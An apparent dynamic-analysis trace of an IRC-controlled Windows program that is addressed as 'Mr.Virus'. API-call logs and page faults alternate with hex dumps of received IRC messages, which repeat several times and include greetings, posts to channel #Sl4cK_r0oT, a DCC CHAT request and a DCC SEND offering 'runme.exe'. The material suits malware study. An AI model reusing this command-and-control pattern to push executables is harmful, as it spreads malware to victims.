4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 43 75 72 72 65 6E 74 55 73 65 72 5B MSG CurrentUser[
4FFD07A0 46 52 4B 5D 5B 37 34 5D 20 3A 48 65 6C 6C 6F 20 FRK][74] :Hello
4FFD07B0 74 68 65 72 65 20 4D 72 2E 56 69 72 75 73 21 0D there Mr.Virus!.
4FFD07C0 0A .
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B80,0x00000004,0x20070B80)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FE3A
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001658)
KERNEL32!TlsSetValue (0x00000001,0x20070B80)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001658)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 4E 4F 54 49 4A36D6B2.IP NOTI
4FFD0790 43 45 20 43 75 72 72 65 6E 74 55 73 65 72 5B 46 CE CurrentUser[F
4FFD07A0 52 4B 5D 5B 37 34 5D 20 3A 48 6F 77 20 61 72 65 RK][74] :How are
4FFD07B0 20 79 6F 75 20 74 6F 64 61 79 3F 0D 0A you today?..
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B80,0x00000004,0x20070B80)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FE1B
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500016CC)
KERNEL32!TlsSetValue (0x00000001,0x20070B80)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500016CC)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x0007200F
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 43 75 72 72 65 6E 74 55 73 65 72 5B MSG CurrentUser[
4FFD07A0 46 52 4B 5D 5B 37 34 5D 20 3A 01 44 43 43 20 43 FRK][74] :.DCC C
4FFD07B0 48 41 54 20 63 68 61 74 20 32 38 38 36 37 39 37 HAT chat 2886797
4FFD07C0 31 34 30 20 37 30 30 30 01 0D 0A 140 7000...
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B70,0x00000004,0x20070B70)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FDFB
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001740)
KERNEL32!TlsSetValue (0x00000001,0x20070B70)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001740)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 43 75 72 72 65 6E 74 55 73 65 72 5B MSG CurrentUser[
4FFD07A0 46 52 4B 5D 5B 37 34 5D 20 3A 01 44 43 43 20 53 FRK][74] :.DCC S
4FFD07B0 45 4E 44 20 72 75 6E 6D 65 2E 65 78 65 20 32 38 END runme.exe 28
4FFD07C0 38 36 37 39 37 31 34 30 20 37 30 30 31 20 32 32 86797140 7001 22
4FFD07D0 34 31 30 01 0D 0A 410...
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B70,0x00000004,0x20070B70)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FDDC
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500017B4)
KERNEL32!TlsSetValue (0x00000001,0x20070B70)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500017B4)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072010
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 23 53 6C 34 63 4B 5F 72 30 6F 54 20 MSG #Sl4cK_r0oT
4FFD07A0 3A 48 65 6C 6C 6F 20 65 76 65 72 79 6F 6E 65 21 :Hello everyone!
4FFD07B0 0D 0A ..
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FDBD
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001828)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001828)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 43 75 72 72 65 6E 74 55 73 65 72 5B MSG CurrentUser[
4FFD07A0 46 52 4B 5D 5B 37 34 5D 20 3A 48 65 6C 6C 6F 20 FRK][74] :Hello
4FFD07B0 74 68 65 72 65 20 4D 72 2E 56 69 72 75 73 21 0D there Mr.Virus!.
4FFD07C0 0A .
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B80,0x00000004,0x20070B80)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FD9E
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x5000189C)
KERNEL32!TlsSetValue (0x00000001,0x20070B80)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x5000189C)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072011
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 4E 4F 54 49 4A36D6B2.IP NOTI
4FFD0790 43 45 20 43 75 72 72 65 6E 74 55 73 65 72 5B 46 CE CurrentUser[F
4FFD07A0 52 4B 5D 5B 37 34 5D 20 3A 48 6F 77 20 61 72 65 RK][74] :How are
4FFD07B0 20 79 6F 75 20 74 6F 64 61 79 3F 0D 0A you today?..
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B80,0x00000004,0x20070B80)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FD7E
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001910)
KERNEL32!TlsSetValue (0x00000001,0x20070B80)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001910)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 43 75 72 72 65 6E 74 55 73 65 72 5B MSG CurrentUser[
4FFD07A0 46 52 4B 5D 5B 37 34 5D 20 3A 01 44 43 43 20 43 FRK][74] :.DCC C
4FFD07B0 48 41 54 20 63 68 61 74 20 32 38 38 36 37 39 37 HAT chat 2886797
4FFD07C0 31 34 30 20 37 30 30 30 01 0D 0A 140 7000...
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B70,0x00000004,0x20070B70)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FD5F
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001984)
KERNEL32!TlsSetValue (0x00000001,0x20070B70)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001984)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003220 accessing page 0x00072012
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 43 75 72 72 65 6E 74 55 73 65 72 5B MSG CurrentUser[
4FFD07A0 46 52 4B 5D 5B 37 34 5D 20 3A 01 44 43 43 20 53 FRK][74] :.DCC S
4FFD07B0 45 4E 44 20 72 75 6E 6D 65 2E 65 78 65 20 32 38 END runme.exe 28
4FFD07C0 38 36 37 39 37 31 34 30 20 37 30 30 31 20 32 32 86797140 7001 22
4FFD07D0 34 31 30 01 0D 0A 410...
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B70,0x00000004,0x20070B70)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FD40
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x500019F8)
KERNEL32!TlsSetValue (0x00000001,0x20070B70)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x500019F8)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
WSOCK32!recv (0x00000001,0x4FFD0760,0x00000400,0x00000000)
USER32!wsprintfA (0x73356F91,":%s!%s@%s %s %s :%s
",0x73356A27....)
USER32!TranslateMessage (0x4FFB179C)
USER32!DispatchMessage (0x4FFB179C)
USER32!GetMessageA (0x4FFB179C,0x00000000,0x00000000,0x00000000)
4FFD0760 3A 49 52 43 5F 42 6F 62 21 64 75 6D 6D 79 40 46 :IRC_Bob!dummy@F
4FFD0770 36 46 33 32 36 30 2E 43 39 45 39 37 33 46 46 2E 6F3260.C9E973FF.
4FFD0780 34 41 33 36 44 36 42 32 2E 49 50 20 50 52 49 56 4A36D6B2.IP PRIV
4FFD0790 4D 53 47 20 23 53 6C 34 63 4B 5F 72 30 6F 54 20 MSG #Sl4cK_r0oT
4FFD07A0 3A 48 65 6C 6C 6F 20 65 76 65 72 79 6F 6E 65 21 :Hello everyone!
4FFD07B0 0D 0A ..
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!CreateThread (0x00000000,0x00000000,0x004027B9,0x20070B90,0x00000004,0x20070B90)
KERNEL32!EnterCriticalSection (0x00000000)
KERNEL32!GetCurrentProcessId ()
**PAGE FAULT: process 0x00000100 - cs:eip 0x0028:0xC0003943 accessing page 0x0004FD21
KERNEL32!LeaveCriticalSection (0x00000000)
KERNEL32!ResumeThread (0x50001A6C)
KERNEL32!TlsSetValue (0x00000001,0x20070B90)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!GetLastError ()
KERNEL32!TlsGetValue (0x00000001)
KERNEL32!SetLastError (0x00000000)
KERNEL32!CloseHandle (0x50001A6C)
KERNEL32!EnterCriticalSection (0x0040A068)
KERNEL32!LeaveCriticalSection (0x0040A068)
KERNEL32!TlsSetValue (0x00000001,0x00000000)
KERNEL32!ExitThread (0x00000000)
KERNEL32!_ExitThread ()
USER32!TranslateMessage (0x4FFB179C)
